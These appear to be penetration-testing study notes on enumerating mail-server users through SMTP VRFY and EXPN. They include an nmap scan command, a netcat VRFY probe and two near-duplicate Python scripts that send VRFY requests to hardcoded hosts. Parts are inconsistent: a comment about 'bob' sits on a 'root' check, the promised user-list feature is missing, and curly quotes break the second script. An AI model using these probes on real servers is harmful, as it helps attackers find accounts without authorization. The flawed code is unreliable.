In certain vulnerable configurations, mail servers can also be used to gather information about a host or network. SMTP39 supports several important commands, such as VRFY and EXPN. A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to verify existing users on a mail server, which can later aid the attacker. Check for enabled methods: nmap --script smtp-commands 172.16.80.27 -p25 //connect to a mail server #nc -nv <ip> 25 //will reply with a banner and smtp shell >VRFY root //checks if bob is a user on the system //check bash script section for enumeration of this ^^ We can utilize the response to brute force check users.

We can edit this slightly to add the ability to grab a text file of users and check many:

#!/usr/bin/python
import socket
import sys
if len(sys.argv) != 2:
 print "Usage: vrfy.py <username> "
 sys.exit(0)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.11.1.215',25))
banner=s.recv(1024)
print banner
# VRFY a user
s.send('VRFY ' + sys.argv[1] + '\r\n')
result=s.recv(1024)
print result

s.close()

#!/usr/bin/python

import socket
import sys

#param check
if len(sys.argv) !=2:
 print “Usage: vrfy.py <username>”
 sys.exit(0)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)#create a socket
connect=s.connect(('192.168.31.215', 25))#connect to the server
banner=s.recv(1024) #receiv the banner
print banner
s.send('VRFY ‘ + sys.argv[1]+’\r\n')#vrfy a user
result=s.recv(1024)
print result
s.close()